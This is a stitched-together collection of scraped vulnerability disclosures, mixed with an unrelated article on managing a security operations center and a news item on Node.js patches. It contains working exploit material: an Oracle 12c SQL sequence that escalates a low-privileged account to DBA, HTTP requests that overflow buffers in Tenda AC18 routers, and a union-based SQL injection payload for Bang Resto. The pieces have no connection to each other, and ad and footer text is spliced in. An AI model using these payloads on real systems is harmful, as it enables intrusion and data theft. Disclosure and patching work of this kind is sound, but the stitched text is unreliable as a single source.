Oracle Database version 12.1.0.2 suffers from a privilege escalation vulnerability that achieves DBA access via the Spatial component.

Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2  
Tested Version(s):         12cR1  
Risk Level:                High  
Solution Status:           Fixed in Oracle Critical Patch Update October 2021  
CVE Reference:             N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.

*****************************************  
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.

To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:

SQL> select comp_name from dba_registry;

*****************************************  
Proof of Concept (PoC):

// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;

SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account “ironman” using sql plus

sqlplus ironman/iron_123

SQL> show user

USER is “IRONMAN”

SQL> select * from session_roles;

no rows selected

SQL> create or replace  procedure  SPATIAL_CSW_ADMIN_USR.hulk  (SQL_TEXT  IN  VARCHAR2) as

    BEGIN

    EXECUTE IMMEDIATE (SQL_TEXT);

    END hulk;  
/

SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');

SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE

——————————————————————————–

DATAPUMP_IMP_FULL_DATABASE

EXP_FULL_DATABASE

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE

——————————————————————————–

DBA

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

Advertisements  
Report this ad

IMP_FULL_DATABASE

DATAPUMP_EXP_FULL_DATABASE

DATAPUMP_IMP_FULL_DATABASE

ROLE

——————————————————————————–

GATHER_SYSTEM_STATISTICS

SCHEDULER_ADMIN

XDBADMIN

XDB_SET_INVOKER

JAVA_ADMIN

JAVA_DEPLOY

WM_ADMIN_ROLE

CAPTURE_ADMIN

OPTIMIZER_PROCESSING_RATE

EM_EXPRESS_ALL

EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated  to the “DBA” role which is the highest database role in Oracle database system.

*****************************************  
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.  
review database account permissions on regular basis.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
perform VA (vulnerability assesment) scans on regular basis.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:   
Security-In-Depth Contributors: Emad Al-Mousa

Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.

Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.  
 

**Introduction**

The REST API endpoint used to modify CryptoSpike users suffers from the following vulnerabilities, which can be exploited from users with minimal privileges:

*   no authorization checks on the user attributes modification, also including role assignments, leading to a privilege escalation up to the role of privileged administrator of the system;
*   lacking input validation functionalities, allowing the modification of all users' attributes (e.g. deactivate them, assigning privileged roles, etc);
*   possibility to change the password of any user, including privileged ones;
*   possibility to show the password hash of any user.

Additionally, the lack of accountability functionalities makes this vulnerability hard to investigate.

**Steps to reproduce**

For the invocation of the vulnerable REST API endpoints, a JWT Bearer Token of a user with minimum privileges will be used. In the example, a user with id 10 named "simpleuser" and only the "Monitoring" privilege set to READ (this privilege exclusively allows a user to check the status of CryptoSpike services) is created:

Invoking with PATCH http method the /users/:userId REST API endpoint under the service "AuthService" (https://hostname/api/v1/Server/auth/users/:userId) it is possible to send, as input, parameters that are not documented in API specification (for example, the attributes _password_, _immutable_). In our case, using the JWT Bearer Token of the user with id 10 and low privileges, it is possible to modify another user (with id 37 in the example). Please note that it is mandatory to include the parameter "roles":

The same endpoint has an issue with the output data, because on every successful invocation, it returns all the user data as stored in the database table. This data also includes the password hash of the modified user. It is also possible to modify other attributes not documented in the API specification: the "immutable" attribute to make a user not editable by other operators, "deletedAt" and "state" attributes do deactivate users.

With this data leakage vulnerability, it is possible to enumerate the password hashes of all users simply varying the :id parameter (for example, from 1 to 3000):

It is also possible to change the password of every other user by simply specifying the password on the JSON parameter, in clear text, including the default privileged user of CryptoSpike named "sysadm" (id equal to 1):

Invoking the same REST API endpoint specifying the current user id as parameter (in the example, using the JWT token of the user with id 10 on the /users/10 endpoint), it is possible to self-attribute the role with id 1 ("Administrator"), thus realizing a complete privilege escalation attack. It is also possible to set the parameter "immutable" to true, thus transforming itself into an immutable user against other users' modifications.

CVE-2023-36646: CVCN

A people-first approach reduces fatigue and burnout, and it empowers employees to seek out development opportunities, which helps retention.

I manage a security operations center (SOC) in the midst of the Great Resignation and a massive cybersecurity skills gap. During this time, I've learned a few surprising things about how to recruit and maintain a cohesive SOC team.

A 2021 Devo study of more than 1,000 cybersecurity professionals found that working in a SOC has some unique pain points, including the amount of information that needs to be processed and the on-call nature of the job. Alert fatigue also contributes to this pain.

I've found that keeping the SOC staffed and engaged starts with a SOC's most important asset: its people. A people-first approach not only helps with reducing fatigue and burnout, but it also empowers employees to seek out opportunities for their own development, greatly aiding in retention. Here are three ways that I rely on to support my SOC colleagues.

**Give and Receive Regular Feedback**

Actionable feedback, both given and received, is something that people naturally desire. When done proactively, the team gains a clear understanding of their performance while building trust with their leaders. Even if everything is going well, letting your colleagues know what they are excelling at is imperative. This positive reinforcement often has more impact than letting them know when something needs to be improved.

I have an open-door policy with my team, which allows for a consistent feedback loop. If I need to be doing more for my team, I expect them to tell me where I can improve; on the flip side, hearing if something is going well helps me better calibrate my leadership style to my team.

I also encourage others to find departments within your company that will provide 180-degree feedback. This is vital for me as both a leader and an employee as it empowers me to check my own blind spots. As a leader, you should want to discover the areas where you can grow and better support your team.

**Rotate Tasks and Responsibilities**

Within my team, I have everyone rotate between managing alerts, self-paced training, and project work. This not only gives each team member a window into different aspects of the SOC, and work to develop themselves, it also removes some of the monotony and stress of the job.

For instance, if you have to come to work every day and consistently worry about urgent tickets and client requests, you will feel anxious and as though you constantly have to fix other people's problems. These feelings contribute mightily to burnout. Additionally, finding ways to automate regular tasks will reduce the stress and burden placed on the team so they can focus on more strategic work.

**Promote Interactions Throughout the Company**

It can be easy to get lost looking at each tree in the SOC, when you should instead be focusing on the forest of the company. That is why I encourage my team to take a step back and realize how their work is helping the company and community.

I do this by coordinating opportunities for my team to work with individuals outside their realm, for instance in sales or marketing, so everyone understands the product and overall goals. Also, assisting others outside of your team and even your company helps you to fully understand the value you provide and where others can benefit from your team's support and expertise.

I encourage my team to complete a quarterly "Do Good" project, which focuses on the needs of the company and the larger security community. For instance, how can we work together to educate others about bad actors and mitigate the threats they pose? In April, the SOC team identified and validated IP addresses that were being used for attacks across several of our clients. After they were identified, we ensured they were available to the public so others could leverage our knowledge to block attackers.

Doing projects like these reminds the team how critical their work is and unites us around a common goal.

**The Key Differentiator: How People Are Treated**

How the leaders treat their people is a key differentiator in today's job market, especially as many organizations look to creative ways to solve cybersecurity's ongoing talent shortage. It goes without saying that employers should also look to train employees rather than expect them to come to an entry-level job with 30 years of experience and a CISSP cert.

When I am hiring, I look for strong base foundations and proven self-starters, along with potential — and desire — to grow, rather than previous experience. It is always rewarding to give deserving people an opportunity and watch them flourish.

Additionally, having your team complete self-paced training and educational opportunities enables each person to work on skills and techniques that will only aid the company down the line. Fostering that growth is just good business.

While there certainly isn't a one-size-fits-all approach to managing people, as each person, SOC, and company are different, keeping your people at the heart of all things will never go out of style. The stronger your employees, the better off your SOC, and your organization as a whole, will be.

Building a Strong SOC Starts With People

The aaugustin websockets library before 9.1 for Python has an Observable Timing Discrepancy on servers when HTTP Basic Authentication is enabled with basic_auth_protocol_factory(credentials=...). An attacker may be able to guess a password via a timing attack.

@@ -6,6 +6,7 @@

  

  

import functools

import hmac

import http

from typing import Any, Awaitable, Callable, Iterable, Optional, Tuple, Union, cast

  

@@ -132,24 +133,23 @@ def basic\_auth\_protocol\_factory(

  

if credentials is not None:

if is\_credentials(credentials):

  

async def check\_credentials(username: str, password: str) \-> bool:

return (username, password) \== credentials

  

credentials\_list \= \[cast(Credentials, credentials)\]

elif isinstance(credentials, Iterable):

credentials\_list \= list(credentials)

if all(is\_credentials(item) for item in credentials\_list):

credentials\_dict \= dict(credentials\_list)

  

async def check\_credentials(username: str, password: str) \-> bool:

return credentials\_dict.get(username) \== password

  

else:

if not all(is\_credentials(item) for item in credentials\_list):

raise TypeError(f"invalid credentials argument: {credentials}")

  

else:

raise TypeError(f"invalid credentials argument: {credentials}")

  

credentials\_dict \= dict(credentials\_list)

  

async def check\_credentials(username: str, password: str) \-> bool:

try:

expected\_password \= credentials\_dict\[username\]

except KeyError:

return False

return hmac.compare\_digest(expected\_password, password)

  

if create\_protocol is None:

\# Not sure why mypy cannot figure this out.

create\_protocol \= cast(

@@ -158,5 +158,7 @@ async def check\_credentials(username: str, password: str) -> bool:

)

  

return functools.partial(

create\_protocol, realm\=realm, check\_credentials\=check\_credentials

create\_protocol,

realm\=realm,

check\_credentials\=check\_credentials,

)

CVE-2021-33880: Use constant-time comparison for passwords. · aaugustin/websockets@547a26b

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetMacFilterCfg.

Permalink

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formSetMacFilterCfg function, which can be accessed through the URL goform/SetMacFilterCfg.

Go to the function sub_C1334

Go to the function sub_C15F8

In formSetMacFilterCfg function, deviceList is controllable and finally will be passed into the sub_C15F8 function.

In the sub_C15F8 function, it is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**PoC**

POST /goform/setMacFilterCfg HTTP/1.1
Host: 192.168.0.1
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: \*/\*
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
Content\-Type: application/x\-www\-form\-urlencoded; charset\=UTF\-8
X\-Requested\-With: XMLHttpRequest
Content\-Length: 51
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/iptv.html?random\=0.7642888131213508&
Cookie: password\=7c90ed4e4d4bf1e300aa08103057ccbcmho1qw

macFilterType\=1&deviceList\=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

CVE-2022-44175: IoT_vuln/readme.md at main · RobinWang825/IoT_vuln

Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow. via function formWifiWpsOOB.

**Tenda AC18(V15.03.05.19) has a Stack Buffer Overflow Vulnerability****Product**

1.  product information: https://www.tenda.com.cn/
2.  firmware download: https://www.tenda.com.cn/download/detail-2683.html

**Affected version**

V15.03.05.19

**Vulnerability**

The stack overfow vulnerability is in /bin/httpd. The vulnerability occurrs in the formWifiWpsOOB function, which can be accessed through the URL goform/WifiWpsOOB .

The index is controllable. If the conditions are met to sprintf, they will be spliced into tmp. It is worth noting that there is no size check, which leads to a stack overflow vulnerability. An attacker can obtain a stable root shell through a carefully constructed payload.

**PoC**

Poc of Denial of Service(DoS)

POST /goform/WifiWpsOOB HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 336
Origin: http://192.168.0.1
DNT: 1
Connection: close
Referer: http://192.168.0.1/index.html
Cookie: ecos\_pw=eee:language=cn

index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

CVE-2022-44178: IoT_vuln/Tenda/AC18/formWifiWpsOOB at main · RobinWang825/IoT_vuln

Bang Resto version 1.0 suffers from multiple SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty in December of 2022.

    # Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection# Date: 2023-04-02# Exploit Author: Rahad Chowdhury# Vendor Homepage:https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html# Software Link:https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip# Version: 1.0# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53# CVE: CVE-2023-29849*Affected Parameters:*btnMenuItemID, itemID, itemPrice, menuID, staffID, itemPrice, itemID[],itemqty[], btnMenuItemID*Steps to Reproduce:*1. First login your staff panel.2. then go to "order" menu and Select menu then create order and interceptrequest data using burp suite.so your request data will be:POST /bangresto/staff/displayitem.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/111.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 194Origin: http://127.0.0.1Referer: http://127.0.0.1/bangresto/staff/order.phpCookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5Connection: closebtnMenuItemID=1&qty=13. "btnMenuItemID" parameter is vulnerable. Let's try to inject union basedSQL Injection use this query ".1 union select1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())---" in "btnMenuItemID" parameter.4. Check browser you will see user, database and version informations.

Bang Resto 1.0 SQL Injection

In Paramiko before 2.10.1, a race condition (between creation and chmod) in the write_private_key_file function could allow unauthorized information disclosure.

CVE-2022-24302: Changelog — Paramiko documentation

The folioupdate service in Fabasoft Cloud Enterprise Client 22.4.0043 allows Local Privilege Escalation.

################################################################################ # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ################################################################################ # # Product: Fabasoft Cloud Enterprise Client # Vendor: Fabasoft # CSNC ID: CSNC-2022-010 # CVE ID: CVE-2022-29908 # Subject: Local Privilege Escalation # Risk: High # Effect: Locally exploitable # Authors: Tino Kautschke # Date: 14.09.2022 # ################################################################################ Introduction: ------------- The Fabasoft Cloud lets you create a digital business network for your company based on relationships of trust – for secure cross-company, transnational collaboration in the cloud. Fabasoft provides a native client that allows, for example, editing documents directly via the web client or synchronizing documents on the device. \[1-3\] Compass Security identified a local privilege escalation vulnerability, allowing a user on a system with the Fabasoft Cloud Enterprise Client installed, to escalate their privileges to local administrator. Affected: --------- Vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0043 No other version was tested, but it is possible for older versions to be vulnerable. Not vulnerable: \* Fabasoft Cloud Enterprise Client 22.4.0045 Other products were affected (Windows only) \[4\]: Fabasoft Folio / Fabasoft eGov-Suite 2021 UR3, Fabasoft Folio / Fabasoft eGov-Suite 2022, Fabasoft Business Process Cloud Technical Description: ---------------------- The Fabasoft Cloud Enterprise Client uses an update service named FabasoftCloudUS.exe, which is executed with SYSTEM privileges. On update, it looks for new update files in C:\\ProgramData\\fabasoft.plugin, which can be read and written to by arbitrary users. The update service expects a signed MSI file and an empty file with extension '.pending' in this folder to start the update process. The validation check for signed MSI files is vulnerable. It is possible to sign an arbitrary MSI package with a self-signed certificate containing Fabasoft's information in the certificate fields. The validation check will accept the self-signed MSI package and start the setup process with SYSTEM privileges. This means that an unprivileged user can execute arbitrary MSI packages, thus resulting in code execution with full SYSTEM permissions. This can be, e.g., exploited by executing a reverse shell or other malicious commands. Workaround / Fix: ----------------- The validation process for signed MSI files should be revised to ensure that it is not possible to install packages from untrusted sources. A patch has already been released by the publisher. \[4\] The update service should not run in a high privileged context like SYSTEM. It is recommended to set up a dedicated service user with neccessary privileges only. As a customer using the Fabasoft Cloud Enterprise Client, update your installation to the latest version. Workaround: disable Fabasoft Folio Client Update Service "folioupdate". Timeline: --------- 2022-04-13: Discovery by Tino Kautschke 2022-04-13: Initial vendor notification 2022-04-21: Fabasoft public announcement and release of fixed version 2022-04-29: Vulnerability registered as CVE-2022-29908 2022-09-14: Coordinated disclosure of the advisory References: ----------- \[1\] https://help.cloud.fabasoft.com/index.php?topic=doc/User-Help-Fabasoft-Cloud-eng/introduction.htm \[2\] https://help.cloud.fabasoft.com/index.php?topic=doc/Fabasoft-Cloud-Client/introduction.htm \[3\] https://help.cloud.fabasoft.com/index.php?topic=doc/Technical-Information-eng/the-fabasoft-cloud-enterprise-client.htm \[4\] https://www.fabasoft.com/en/support/knowledgebase/client-autoupdate-harmful-code-installation-vulnerability-fsc33251

CVE-2022-29908

All security issues have been patched – update now

All security issues have been patched – update now

  

Node.js maintainers have released multiple fixes for vulnerabilities in the JavaScript runtime environment that could lead to arbitrary code execution and HTTP request smuggling, among other attacks.

In an advisory released last night (July 7), the details of seven now-patched bugs were released, including three separate HTTP Request Smuggling vulnerabilities.

Read more of the latest news about security vulnerabilities

These three vulnerabilities – a flawed parsing of transfer-encoding bug, tracked as CVE-2022-32213; an improper delimiting of header fields issue, tracked as CVE-2022-32214; and an Incorrect parsing of multi-line transfer-encoding bug, tracked as CVE-2022-32215 – could all lead to HTTP request smuggling.

These bugs, which were all rated as medium severity, impact all versions of the 18.x, 16.x, and 14.x releases lines. llhttp v6.0.7 and llhttp v2.1.5 contains the fixes that were updated inside Node.js.

**Other issues**

The advisory also contains details of a DNS rebinding vulnerability in via invalid IP addresses.

Rated as high severity, the bug (CVE-2022-32212) could allow for arbitrary code execution, the advisory warns.

“The check can easily be bypassed because does not properly check if an IP address is invalid or not.

“When an invalid IPv4 address is provided browsers will make DNS requests to the DNS server, providing a vector for an attacker-controlled DNS server or a MitM who can spoof DNS responses to perform a rebinding attack and hence connect to the WebSocket debugger, allowing for arbitrary code execution. This is a bypass of CVE-2021-22884,” the post reads. The vulnerability impacts all versions of the 18.x, 16.x, and 14.x releases lines.

The advisory also details a DLL Hijacking vulnerability on Windows (CVE-2022-32223), and CVE-2022-32222, a medium-severity bug that could allow an attacker to attempt to read openssl.cnf from upon system startup.

BACKGROUND High severity OpenSSL bug could lead to remote code execution

Finally, the release also contains fixes for a vulnerability in OpenSSL, as previously reported by The Daily Swig.

The moderate-severity implementation bug (CVE-2022-2097) could cause encryption to fail in some circumstances.

AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data, which could reveal sixteen bytes of data that was pre-existing in the memory that wasn’t written.

In the special case of ‘in place’ encryption, sixteen bytes of the plaintext could be revealed.

Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected.

All of the vulnerabilities have been fixed in the latest versions, Node.js v14.20.0 (LTS), Node.js v16.16.0 (LTS), and Node.js v18.5.0 (Current).

YOU MAY ALSO LIKE Spring Data MongoDB hit by another critical SpEL injection flaw

Search

lenovo warranty check/lookup | check warranty status | lenovo support us